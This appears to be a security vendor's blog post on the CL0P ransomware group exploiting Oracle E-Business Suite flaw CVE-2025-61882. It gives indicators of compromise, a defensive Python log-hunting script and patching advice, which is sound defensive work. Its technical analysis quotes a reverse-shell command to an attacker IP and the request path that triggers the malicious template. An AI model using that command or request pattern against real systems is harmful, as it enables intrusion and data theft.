Google Issues Alert on CL0P Ransomware Actively Exploiting Oracle E-Business Suite Zero-Day CVE-2025-61882

Key takeaways:

  • CL0P ransomware is actively exploiting a zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite.
  • Organizations using Oracle EBS are urged to apply emergency patches released on October 4, 2025.
  • The campaign involves data exfiltration and delayed extortion tactics.

On October 10, 2025, Google’s Threat Intelligence Group (GTIG) issued an alert regarding active exploitation of a zero-day vulnerability in Oracle E-Business Suite (EBS) by the CL0P ransomware group. The vulnerability, identified as CVE-2025-61882, is being actively exploited in the wild. Organizations using Oracle E-Business Suite are urged to apply the emergency patches released on October 4 to mitigate the risk of exploitation. This campaign underscores the strategic advantage of coupling zero-day exploitation with delayed extortion. By targeting public-facing enterprise applications, CL0P-affiliated actors can rapidly exfiltrate data at scale while evading early detection.

Campaign Details

Beginning September 29, 2025, GTIG and Mandiant detected a large-scale email campaign targeting executives at numerous organizations. The emails claimed that sensitive data had been stolen from their Oracle EBS environments. These extortion messages, sent from hundreds of compromised third-party accounts, included legitimate file listings dating back to mid-August, adding credibility to the threat. While no victims have yet appeared on the CL0P data leak site (DLS), past campaigns suggest that data may be published several weeks after the initial outreach.

Patching and Vulnerability Information

Oracle reported on October 2 that the exploited vulnerabilities had been patched in the July Critical Patch Update (CPU). They urged customers to apply the latest CPU immediately. Following this, on October 4, Oracle released emergency fixes specifically addressing CVE-2025-61882 and reiterated the importance of keeping all patches current.

Technical Analysis

GTIG’s analysis attributes the campaign to a CL0P actor with months of intrusion activity. Initial exploitation may have begun as early as July 10, 2025. By August 9, the zero-day vulnerability, CVE-2025-61882, was actively exploited against UiServlet and SyncServlet components.

The attack employs a multi-stage Java implant framework combining Server-Side Request Forgery (SSRF), CRLF injection, authentication bypass, and XSL template injection to achieve remote code execution.

In August, attackers exploited SyncServlet via a POST request to /OA_HTML/SyncServlet. They then leveraged the XDO Template Manager to upload malicious XSL payloads to the XDO_TEMPLATES_B table. A template preview request such as /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=TMP|DEF<16_RANDOM_HEX>&TemplateType=XSL-TEXT triggers payload execution.

The XSL payload decodes a Base64 Java implant, instantiates a ScriptEngine, and evaluates attacker-controlled code. Commands executed under the “applmgr” account include system reconnaissance (e.g., cat /etc/fstab, df -h, ip addr) and reverse shell connections (e.g., bash -i >& /dev/tcp/200.107.207.26/53 0>&1).

Two distinct Java chains, a GOLDVEIN.JAVA downloader and a nested SAGE* reflective-loader sequence culminating in SAGEWAVE, enable second-stage payload retrieval and persistent filter installation.

Indicators of Compromise (IOCs)

The following Indicators of Compromise have been identified in connection with this CL0P campaign targeting Oracle E-Business Suite:

| Type | Indicator | Description |
|---|---|---|
| Network | 200.107.207.26 | IP address observed in exploitation attempts targeting UiServlet and SyncServlet components. |
| Network | 161.97.99.49 | IP address observed in exploitation attempts targeting the UiServlet component. |
| Network | 162.55.17.215:443 | GOLDVEIN.JAVA C2 |
| Network | 104.194.11.200:443 | GOLDVEIN.JAVA C2 |
| Network | /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG… | Indicator of an attempt to trigger the malicious XSL payload. Look for requests where TemplateCode begins with TMP or DEF. |
| Network | /OA_HTML/configurator/UiServlet | Endpoint targeted in the July 2025 exploitation activity. |
| Network | /OA_HTML/SyncServlet | Endpoint targeted in the August 2025 exploitation activity. |
| Network | /help/state/content/destination./navId.1/navvSetId.iHelp/ | HTTP path substring filtered for by SAGEWAVE. |

Practical Takeaways

For Technical Staff:

  • Immediate Patching: Apply Oracle’s October 4 emergency patches for CVE-2025-61882 without delay.
  • Hunt for Malicious Templates: Review entries in the XDO_TEMPLATES_B table where TEMPLATE_CODE begins with “TMP” or “DEF.”
  • Restrict Outbound Internet Access: Limit outbound Internet access from EBS servers to block command and control (C2) communications.
  • Monitor Network Logs: Look for anomalous requests to /OA_HTML/configurator/UiServlet and the TemplatePreviewPG endpoint.
  • Leverage Memory Forensics: Use memory forensics on Java processes to detect in-memory implants not visible on disk.
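As an added example (not code from the GTIG alert or from PurpleOps), the following Python script applies the network indicators from the IoC table and the TemplateCode hunting guidance above to web-tier access-log lines. It assumes the EBS front end writes NCSA combined-format access logs; the sample lines are constructed for illustration and are not real traffic.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicators copied from the IoC table above; extend from your own intel feed.
SUSPICIOUS_IPS = {"200.107.207.26", "161.97.99.49", "162.55.17.215", "104.194.11.200"}
TARGETED_PATHS = {"/OA_HTML/configurator/UiServlet", "/OA_HTML/SyncServlet"}
PREVIEW_PAGE = "/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG"
SAGEWAVE_PATH = "/help/state/content/destination./navId.1/navvSetId.iHelp/"
# TMP or DEF followed by 16 random hex characters, as in the TemplateCode described above.
TEMPLATE_CODE_RE = re.compile(r"^(TMP|DEF)[0-9a-fA-F]{16}$")
# Assumption: the EBS web tier writes NCSA combined-format access logs.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def classify(line):
    """Return the reasons a single access-log line is suspicious (empty list if clean or unparseable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, target = m.group("ip"), m.group("target")
    parts = urlsplit(target)
    reasons = []
    if ip in SUSPICIOUS_IPS:
        reasons.append(f"source {ip} is a published indicator")
    if parts.path in TARGETED_PATHS:
        reasons.append(f"request to exploited endpoint {parts.path}")
    if SAGEWAVE_PATH in parts.path:
        reasons.append("path contains the substring filtered for by SAGEWAVE")
    query = parse_qs(parts.query)
    if parts.path == "/OA_HTML/OA.jsp" and PREVIEW_PAGE in query.get("page", []):
        for code in query.get("TemplateCode", []):
            if TEMPLATE_CODE_RE.match(code):
                reasons.append(f"TemplatePreviewPG with attacker-style TemplateCode {code}")
            elif code.startswith(("TMP", "DEF")):
                reasons.append(f"TemplatePreviewPG with TemplateCode prefix to review: {code}")
    return reasons

def hunt(lines):
    """Map each suspicious line to its reasons; clean lines are omitted."""
    results = ((line, classify(line)) for line in lines)
    return {line: reasons for line, reasons in results if reasons}

# Constructed sample log lines (not real traffic): one clean request and three that should fire.
SAMPLE_LOG = [
    '10.1.2.3 - - [11/Oct/2025:09:00:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 512',
    '200.107.207.26 - - [09/Aug/2025:02:14:07 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 88',
    '10.1.2.3 - - [09/Aug/2025:02:15:30 +0000] "GET /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=TMP0123456789abcdef&TemplateType=XSL-TEXT HTTP/1.1" 200 3001',
    '10.1.2.3 - - [12/Aug/2025:04:00:00 +0000] "GET /help/state/content/destination./navId.1/navvSetId.iHelp/x HTTP/1.1" 200 10',
]
```

Run `hunt()` over the real access log of each EBS web-tier node; a hit on the TemplatePreviewPG rule should be followed by a review of the matching TEMPLATE_CODE rows in XDO_TEMPLATES_B.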

For Business Leaders:

  • Ensure Patch Management: Verify that your organization has a procedure in place for the rapid deployment of security patches, especially for critical enterprise applications.
  • Review Security Policies: Assess and update security policies to ensure that they adequately address the risks associated with zero-day exploits and data exfiltration.
  • Implement Network Segmentation: Use network segmentation to limit the impact of a potential breach by restricting lateral movement.
  • Enhance Security Awareness Training: Educate employees on the risks of phishing emails and the importance of reporting suspicious activity.
  • Supply-chain risk monitoring: Implement supply chain risk monitoring, particularly focusing on third-party vendors with access to your Oracle EBS environments.
  • Real-time ransomware intelligence: Subscribe to a reliable real-time ransomware intelligence feed to stay informed about emerging threats and IOCs.

PurpleOps and Proactive Cybersecurity

PurpleOps offers a range of services to help organizations proactively manage their cybersecurity posture and mitigate the risks associated with threats like the CL0P ransomware.

  • Cyber Threat Intelligence Platform: Our cyber threat intelligence platform provides real-time insights into emerging threats, including IOCs and TTPs associated with ransomware groups like CL0P. This helps organizations proactively identify and respond to potential attacks.
  • Dark Web Monitoring Service: Our dark web monitoring service helps organizations identify compromised credentials and sensitive data that may be circulating on the dark web. This information can be used to prevent account takeovers and data breaches.
  • Breach Detection and Incident Response: PurpleOps offers breach detection and incident response solutions to help organizations quickly identify and contain security incidents. Our team of experienced security professionals can help you develop and implement a comprehensive incident response plan.
  • Underground Forum Intelligence: Gain access to underground forum intelligence to understand attacker tactics and strategies, enabling proactive defense measures.
  • Brand Leak Alerting: Implement brand leak alerting to identify and mitigate data leaks that could be exploited by attackers.
  • Telegram threat monitoring: We can implement telegram threat monitoring to track threat actor communications and identify potential threats.
  • Supply-chain risk monitoring: We can implement supply-chain risk monitoring, particularly focusing on third-party vendors with access to your Oracle EBS environments.

Given CL0P’s history of leveraging zero-days from 2020 through 2025, organizations must assume they remain prime targets and maintain rigorous patch and monitoring regimes.

For more information on how PurpleOps can help protect your organization from ransomware and other cyber threats, visit our PurpleOps Solutions or contact us for a consultation at PurpleOps Solutions. You can also explore our platform for real-time cyber threat intelligence at https://www.purple-ops.io/platform/. To learn more about our red team operations or penetration testing services, visit https://www.purple-ops.io/red-team-operations and , respectively. If you have concerns about your supply chain security, check out https://www.purple-ops.io/supply-chain-information-security. Finally, for ransomware-specific protection, see https://www.purple-ops.io/protect-ransomware and for dark web monitoring capabilities, visit https://www.purple-ops.io/dark-web-monitoring.

FAQ

Q: What is CVE-2025-61882?

A: CVE-2025-61882 is a zero-day vulnerability in Oracle E-Business Suite that is being actively exploited by the CL0P ransomware group.

Q: What should organizations do to protect themselves?

A: Organizations using Oracle E-Business Suite are urged to apply the emergency patches released on October 4, 2025, to mitigate the risk of exploitation.

Q: What are the indicators of compromise (IOCs) for this campaign?

A: The IOCs include specific IP addresses and network endpoints used in the exploitation attempts, as detailed in the IOCs section above.